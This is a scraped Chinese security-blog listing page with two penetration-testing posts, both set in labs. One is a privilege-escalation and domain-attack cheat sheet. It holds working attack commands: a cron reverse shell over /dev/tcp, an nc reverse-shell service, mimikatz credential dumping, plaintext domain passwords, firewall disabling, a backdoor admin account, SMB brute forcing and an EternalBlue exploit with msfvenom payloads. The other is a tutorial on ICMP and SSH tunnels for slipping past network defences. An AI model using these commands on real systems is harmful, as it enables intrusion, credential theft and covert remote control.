/tmp/forest/etc/crontabnc -lvnp 1234提权系列命令bash提权/usr/bin/bash -p软连接+修改环境变量提权ramses@NullByte:/var/www/backup$ ./procwatchPID TTY TIME CMD3407 pts/0 00:00:00 procwatch3408 pts/0 00:00:00 sh3409 pts/0 00:00:00 psramses@NullByte:/var/www/backup$ ln -s /bin/sh psramses@NullByte:/var/www/backup$ export PATH=.:$PATHramses@NullByte:/var/www/backup$ ./procwatchdocker逃逸成功,是root权限(docker容器),即可利用如下命令提权(计划任务提权/添加计划任务)echo "/bin/bash -i >& bash -i >& /dev/tcp/10.10.10.130/1234 0>&1">> /tmp/forest/tmp/shell.shchmod +x /tmp/forest/tmp/shell.shcat /tmp/forest/tmp/shell.sh# 写入crontab计划任务,表示每隔1分钟以root权限执行一次计划echo '*/1 * * * * root bash /tmp/shell.sh' > /tmp/forest/etc/crontabcat /tmp/forest/etc/crontabnc -lvnp 1234tcpdump提权COMMAND='id'TF=$(mktemp) # 一个临时文件路径echo "$COMMAND" > $TF # 追加要执行的命令到上面那个文件chmod +x $TF # 赋予执行权限sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root# 注意这里 ⬆ 是你需要监听的网卡地址# 即可提权执行命令find提权(find需要具有suid权限,即可提权)# sudosudo find . -exec /bin/sh \; -quit# shellfind . -exec /bin/sh \; -quit计划任务提权# 命令crontab -e# sudosudo crontab -e# 修改计划任务文件,或者追加一个定时任务,前提是root用户的计划任务mysql提权# 获得一个shellmysql -e '\! /bin/sh'# sudo + shellsudo mysql -e '\! /bin/sh'# udf提权,后续文章讲解脏牛提权# exp地址https://github.com/gbonacini/CVE-2016-5195# 脏牛提权https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh# 一般情况靶机上面无法运行脏牛的提权文件,需要结果预编译后执行# g++编译.cpp文件为可执行文件:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil# gcc编译.c文件为可执行文件:gcc -pthread dirty.c -o dirty -lcryptgcc 45010.c -o 45010烂土豆提权(windows)https://github.com/foxglovesec/Potatojuicypotato.exe(多汁土豆提权)# 下载地址https://github.com/ohpe/juicy-potato# 提权步骤# 查看本地用户的权限,是否具有SeImpersonate或SeAssignPrimaryToken权限whoami /allwhoami priv# 如果开启SeImpersonate权限,juicypotato的参数可以使用-t t# 如果开启SeAssignPrimaryToken权限,juicypotato的参数可以使用-t u# 如果均开启,可以选择-t * 如果均未开启,那么无法提权。# 查看RPC默认端口是否为135netstat -abno# 若rpc服务被修改,则使用-n 参数指定修改后的端口,如 -n 111# 添加防火墙规则,允许135端口入站netsh advfirewall firewall add rule name="135" protocol=TCP dir=in localport=135 action=allow# 不同操作系统选择可用的CLSID# 参考列表:https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md# 列表中随便选择了一个6d18ad12-bde3-4393-b311-099c346e6df9# 选择系统未占用的端口作为监听端口# 最终提权命令如C:\wmpub\JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {6d18ad12-bde3-4393-b311-099c346e6df9}另一个大佬写的webshell、shellcode的juicyPotato.exe# 下载地址https://github.com/uknowsec/JuicyPotato# 提权命令C:\juicyPotato_32.exe -p whoami# 执行命令execute -f juicypotato.exe -p net user test 123456execute -f juicypotato.exe -p net localgroup administrators test /add...... 持续更新中,访问泷羽Sec官网即可,longyusec.comFTP系列ProFTPd拷贝漏洞telnet 10.10.10.198 21site cpfr /home/patrick/version_control # 将这个文件拷贝site cpto /home/FTP/upload/version_control # 拷贝的文件放到这里FTP常用命令get version_control # 下载文件send version_control # 将本地文件发送到服务器(上传)CMS系列WordPress默认主题目录(主题名称需要小写)curl http://10.10.10.203/WordPress/wp-content/themes/twentynineteen/secret.phpjoomla内容管理系统,利用网站https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cnjoomla默认主题目录http://192.168.1.110/templates/beez3/index.php域信息收集域内基础信息收集net view /domain # 查看域net view /domain:XXX(域名) # 查看域内所有的计算机net group /domain # 查询域内所有用户组列表net group "domain computers" /domain # 查看所有域成员计算机列表net accounts /domain # 获取域密码信息nltest /domain_trusts # 获取域信任信息查找域控制器# 查看域内控制器的机器名nltest /DCLIST:XXX# 查看域控制器的主机名Nslookup -type=SRV _ldap._tcp# 查看当前时间net time /domain# 查看域控制器组# 真实环境中,一般存在两台或两台以上的域控制器,其目的是:一旦主域控制器发生故障,# 备用的域控制器可以使域内服务验证正常进行。net group "Domain Controllers" /domainnetdom query pdc获取域内的用户和管理员信息查询所有域用户列表# 向域控制器进行查询net user /domain# 获取域内用户详细信息wmic useraccount get /all# 查看存在的用户dsquery user# 查询域内置本地管理员组用户net localgroup administrators /domain查询域管理员用户组# 查询域管理员用户net group "domain admins" /domain# 查询管理员用户组net group "Enterprise Admins" /domain域管理员定位工具# 下载https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon# 参数psloggedon [-] [-l] [-x] [\\computername|username]-:显示支持的选项和用于输出值的单位。-l:仅显示本地登录,不显示本地和网络资源登录。-x:不显示登录时间。\\computername:指定要列出登录信息的计算机的名称。Username:指定用户名,在网络中搜索该用户登录的计算机。查找域管理进程本机检查# 获取域管理员列表net group "Domain Admins" /domain# 列出本机所有进程及进程用户Tasklist /v# 寻找是否有进程所有者为域管理员的进程查询域控制器的域用户会话# 查询域控制器列表net group "Domain Controllers" /domain# 收集域管理员列表net group "Domain Admins" /domain# 收集所有活动域会话列表Netsess.exe –h# 交叉引用域管理员列表与活动会话列表# 将域控制器列表添加到 dcs.txt 中,将域管理员列表添加到 admins.txt 中,并和 netsess.exe 放在同一个目录下。运行如下脚本后,会在当前目录下生成一个 sessions.txt 文本文件FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt && FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr/I %a# 其他脚本下载[GDA](https://github.com/nullbind/Other-Projects/tree/master/GDA)扫描远程系统上运行的任务# 同样首先从“域管理员”组中收集域管理员的列表。net group "Domain Admins" /domain# 然后使用下列脚本,其中 ips.txt 填入目标域系统的列表,在 names.txt 填入收集来的域管理员的列表。FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause扫描远程系统上 NetBIOS 信息# 同样,先收集域管理员列表,然后将目标域系统列表添加到 ips.txt 文件中,将收集到的域管理员列表添加到 admins.txt 文件中,并置于同一目录下.for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i# 这里也可以使用 nbtscan 工具。先收集域管理员列表,然后将目标域系统列表添加到ips.txt 文件中,将收集到的域管理员列表添加到 admins.txt 文件中,和 nbtscan 工具置于同一目录下.for /F %i in (ips.txt) do @echo [+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %ipowershell域内信息收集Get-NetDomain # 获取当前用户所在的域名称。Get-NetUser # 返回所有用户的详细信息。Get-NetDomainController # 获取所有域控制器。Get-NetComputer # 获取所有域内机器的详细信息。Get-NetOU # 获取域中的 OU 信息。Get-NetGroup # 获取所有域内组和组成员信息。Get-NetFileServer # 根据 SPN 获取当前域使用的文件服务器。Get-NetShare # 获取当前域内所有网络共享。Get-NetSession # 获取在指定服务器存在的会话信息。Get-NetRDPSession # 获取在指定服务器存在的远程连接信息。Get-NetProcess # 获取远程主机的进程信息。Get-UserEvent # 获取指定用户的日志信息。Get-ADObject # 获取活动目录的对象信息。Get-NetGPO # 获取域所有组策略对象。Get-DomainPolicy # 获取域默认或域控制器策略。Invoke-UserHunter # 用于获取域用户登录计算机及该用户是否有本地管理权限。Invoke-ProcessHunter # 查找域内所有机器进程用于找到某特定用户。Invoke-UserEventHunter # 根据用户日志获取某域用户登录过哪些域机器域渗透/横向移动/windows渗透枚举域内用户netexec ldap 10.10.11.51 -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users域提权ms14-068ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123使用mimikatz枚举票据mimikatz # kerberos::purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造mimikatz # kerberos::list //查看当前机器凭证mimikatz # kerberos::ptc TGT_douser@DEMO.COM.ccache //将票据注入到内存中mimikatz # sekurlsa::logonpasswords //显示所有的密码使用mimikatz执行查看日志发现抓到了域控的明文口令mimikatz.exe log privilege::debug sekurlsa::logonpasswords登录,连接并查看域控,通过net use挂载域控共享目录net use \\192.168.93.10\ipc$ "zxcASDqw123!!" /user:Administrator # 使用密码登录到域/SMBnet use \WIN-ENS2VR5TR3Ndir \\WIN-ENS2VR5TR3N\c$将一个脚本拷贝到域主机上去copy C:\nc.exe \\WIN-ENS2VR5TR3N\c$\nc.exe创建执行任务,关闭防火墙sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"sc \\WIN-ENS2VR5TR3N start unablefirewall第一种上线上线方法:创建nc反弹shell上线sc \\WIN-ENS2VR5TR3N create ncshell binpath= "c:\nc.exe 192.168.183.129 1234 -e cmd"sc \\WIN-ENS2VR5TR3N start ncshell第二种方法:添加计划任务上线shell at \\192.168.138.138 22:10:00 c:\win7beacon.exe放行3389端口netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389修改注册表,设置允许远程登录reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fshutdown /r /t 0域内SMB爆破proxychains hydra -l Administrator -P pass.txt \-s 445 -t 4 -vV -m "SMB" \SMB://192.168.138.138创建计划任务执行命令shell at \\192.168.93.20 23:16:00 'netsh advfirewall set allprofiles state off'windows渗透手工干永恒之蓝,脚本利用以及shellcode生成和使用git clone https://github.com/worawit/MS17-010.gitnasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.binnasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.binMSFvenom -p windows/x64/shell_reverse_tcp LPORT=2222 LHOST=192.168.93.100 --platform windows -a x64 --format raw -o sc_x64_payload.binMSFvenom -p windows/shell_reverse_tcp LPORT=2222 LHOST=192.168.183.129 --platform windows -a x86 --format raw -o sc_x86_payload.bincat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bincat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.binpython eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.binproxychains python ../eternalblue_exploit7.py 192.168.183.149 sc_all.bin域这块就差不多学了这么多,还有补充的话,欢迎师傅们留言遇到的一些问题1、ssh连接排错方案ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.130# Unable to negotiate with 10.10.10.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dssssh ubuntu@10.10.10.131 -oPubkeyAcceptedKeyTypes=+ssh-rsa -i id_rsassh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa -i rain_rsa ubuntu@10.10.10.131此处省略1w字,暂时就这么多往期推荐【内网渗透】隐藏通信隧道技术内网渗透,流量转发Linux内网渗透(2w字超详细)AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,WordPress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年06月14日
1,428 阅读
0 评论
0 点赞
2025-06-14
【内网渗透】隐藏通信隧道技术,牢饭直通车
前言最近一直在学如何在渗透测试中隐藏自己的渗透行为,参考了freebuf大佬secur1ty 作者的文章,特意写下了本篇文章隐藏通信隧道技术概述为什么需要?在内网渗透测试中,隐藏通信隧道技术那可是“生存必备技能”。想象一下,内网就像个有超严门禁的小区,各种边界设备和入侵检测装置就是那尽职的保安,啥都想拦。隐藏通信隧道技术就是潜入小区的“秘密通道”,帮我们轻松绕过保安,实现内网和外网间的数据传输。这可是保障渗透测试顺利进行的关键,不然后续的信息收集、漏洞利用啥的都得“凉凉”,这技术学的好,牢饭吃的饱(牢饭也很香)常见隧道网络层:IPV6隧道、ICMP隧道传输层:TCP隧道、UDP隧道、端口转发应用层:SSH隧道、HTTP(S)隧道、DNS隧道接下来将从三种隧道中各选集中进行试验常见隧道分类及工具网络层IPV6 隧道工具:6tunnel(kali自带)目标机:winserver 10,需先开启IPV6并查看地址。攻击机操作:使用6tunnel命令将目标机的80端口(IPV6地址)转发到本机80端口(IPV4地址),实现访问本机80端口即可访问目标机web服务首先我们需要打开目标机器的ipv6(在目标没有开启的情况下)那么我们关闭之后看看区别这里只是看看效果奥,还是需要重新打开的,下面是我的ipv6地址fe80::bc82:bd9c:bf05:15fe%6随后我们在80端口开启一个http服务用于模拟web应用程序python3 -m http.serverkali安装6tunnelapt install 6tunnel之后我们需要先关闭目标机器的防火墙查看我们的kali的网卡名称,与目标的ipv6地址进行拼接,注意区分那个百分号前后内容,这条命令的含义就是将目标机的80端口(目标机使用IPV6地址)转发到本机的80端口尚(本机使用IPV4地址)6tunnel -4 80 fe80::bc82:bd9c:bf05:15fe%eth0 80完整命令如下,转发成功后,访问我们的目标机器以及kaili的80端口,发现显示的结果是一样的,这时候就已经转发成功了ICMP隧道相关学习文章:【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS通常来说,两台主机通信时,必须开启特定端口,像SSH用22端口、RDP用3389端口。但要是用上ICMP隧道,那可就省事多了,根本不需要开放其他端口。ICMP隧道简单又实用。在渗透测试里,要是防火墙把HTTP、HTTPS、DNS这些常用协议的数据包都给封了,咱就可以瞅准网管容易忽视的ICMP协议。只要把TCP数据包往ICMP数据包里一装,要是防火墙不对ICMP包拦截,那突破防火墙就成了一件轻松的事。工具1:icmpsh安装:需要先安装python的impacket类库,可以通过apt-get或从github下载源码安装git clone https://gitee.com/WeiyiGeek/icmpshell.git在使用该工具的时候可能会遇到一些错误(kali系统)这个错误,是代码错误,写法不是这样写的,需要修改一下这个run.sh接下来你还会遇到一个错误,那是因为你执行这个py脚本的时候使用的python3,而不是python2,这个工具使用python2写的,所以需要进行修改继续修改这个run.sh,找到这一行由于icmpsh要代替系统本身的ping应答,所以要关闭一下系统的ping应答,否则工具将无法稳定运行sysctl -w net.ipv4.icmp_echo_ignore_all=1随后执行如下命令(建议自行摸索,适合我的不一定适合师傅你们,我搞了一个下午)sudo apt updatesudo apt install python2 -ysudo apt install python2-dev libssl-dev libffi-dev -ycurl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.pysudo python2 get-pip.pypython2 -m pip install --upgrade "pip==20.3"pip2 install "impacket==0.9.24" "pyOpenSSL<=18.0.0" "pyasn1<0.5" "pycryptodomex<=3.4.3"此时就能够正常运行啦,依次输入攻击机IP和受害机IP便会自动输出需要在受害机上的命令(上图的下方绿色框内),命令如下icmpsh.exe -t 192.168.110.128 -d 500 -b 30 -s 128执行上面命令之前需要将icmpsh.exe上传到靶机上(kali:python -m http.server)其次需要配置防火墙出站规则所有端口不允许出网(上不了网,包括内网中tcp也互相访问不了,只能ping通)选择tcp,和所有远程端口阻止连接我们阻止全部的tcp连接,此时也能够正常上线在我们关闭这个tcp的所有端口出站规则后,就怎么也反弹不成功了重新打开防火墙的出站规则页面,我们设置好允许tcp出站,没过一会儿就上线了流量分析结果如下同理使用工具2:pingtunnel,教学如下【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS传输层1.端口转发工具:lcx下载地址:http://www.vuln.cn/wp-content/uploads/2016/06/lcx_vuln.cn_.zip首先kali和靶机都执行如下命令# windows靶机lcx.exe -slave 192.168.110.128(攻击机IP) 4444 127.0.0.1 3389# kali./portmap -m 2 -p1 4444 -h2 192.168.110.128 -p2 5555输入正确的用户名和密码,就会显示这个界面,注意连接的是kali的IP和转发后的端口,以此来验证端口转发成功通过端口转发,连接到windows靶机2、内网代理相关的学习文章:vulnerable_docker,三种代理方法打入内网2025最新教程,使用雷池搭建内网靶场,进行简单的WAF绕过雷池+frp内网穿透,搭建企业级内网防护,无需花高额费用买服务器,教科书级别教学内网渗透必备,microsocks,一个轻量级的socks代理工具应用层1、SSH基本上,所有的 Unix/Linux 主机都支持 SSH 协议,而且大家都能用它来通信。在实际场景里,网管们经常靠 SSH 连接远程管理内网主机,所以边界设备一般不会拦 SSH 流量。再说了,SSH 流量是加密的,普通的入侵检测工具很难发现里面有什么异常。这就让渗透测试人员有了机会,能用 SSH 搭起别的隧道很难搞定的 TCP 通信隧道。SSH常见参数-C 压缩传输-f 后台执行SSH-N 建立静默连接-g 允许远程主机连接本地用于转发的端口-L 本地端口转发-R 远程端口转发-D 动态转发-P 指定SSH端口(1).本地转发实验环境:攻击机无法访问靶机内网,可以访问靶机的web,且已获得web服务器的权限,web服务器和内网服务器能互相访问实验目标:通过本地端口转发,访问攻击机本地的2021端口便可以打开靶机的远程桌面首先在已经连上得kali上执行ssh -CfNg -L 2021:192.168.110.132:3389 kali@192.168.110.128# 132是靶机,128是kali# 解释:这条命令的作用,在攻击机上建立一个本地ssh服务器的ssh隧道# 将本地的2021端口的流量通过这个隧道转发到远程主机192.168.110.132的3389端口# 重点如下:# 这样,当你在本地机器上访问攻击机本地的2021端口时,实际上访问的是远程主机192.168.110.132的3389端口这里输入的是kali的密码,而不是web服务器的密码奥netstat -tulnp | grep "2021" # 进一步验证是否开启了转发功能尝试使用攻击机也就是本机的远程桌面连接kali的7890端口直接连接成功(2).远程转发这节的网络结构可能有所变化,不同的参照物,理解起来也不同,所以特意列出来了(之前攻击机都是kali,靶机是这里的内网服务器,本机是本机)结构如下:kali作为web服务器(模拟公网服务器) 192.168.110.128本机作为攻击机 192.168.110.1内网服务器 192.168.168.132实验环境:攻击机无法访问数据库服务器,也无法访问web服务器但已获得web服务器的权限,web服务器和数据库服务器可以互相访问,web服务器可以访问具有公网IP的攻击机实验目标:通过访问攻击机也就是本机的7890端口来访问对方内网服务器的3389端口在web服务器(kali)上执行ssh -CfNg -R 7890:192.168.110.132:3389 kali@192.168.110.128然而这个时候,本机却连不上了,也就是攻击机器,访问不了kali这个web服务器(却获得了kali的web服务器权限,就可以用-R参数)(3).动态转发,SOCKS搭建关于SOCKS的搭建还可以参考我写的这一篇文章:内网渗透必备,microsocks,一个轻量级的socks代理工具ssh -CfNg -D 6000 kali@192.168.110.128我们打开这个插件,如果没有插件的话可以找我这篇文章自取:【渗透测试】16个实用谷歌浏览器插件分享配置好kali的IP地址和ssh开启的端口点击连接kali代理,此时成功配置代理访问百度或者对方的内网靶机2、HTTP / HTTPS隧道这里介绍一种常用的工具 reGeorg ,使用教学:vulnerable_docker,三种代理方法打入内网3、SOCKS代理常见工具:EarthWorm、SocksCap64、ProxyChains至此感谢师傅们愿意花这点时间看完,谢谢!参考:https://longyusec.com/longyushoulu/52/https://longyusec.com/longyushoulu/46/https://longyusec.com/longyushoulu/331/https://www.freebuf.com/articles/network/275436.html相关的学习文章推荐:内网渗透,流量转发Linux内网渗透(2w字超详细)AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透一个永久的渗透知识库
2025年06月14日
1,491 阅读
0 评论
0 点赞
1
...
5
6
7
...
14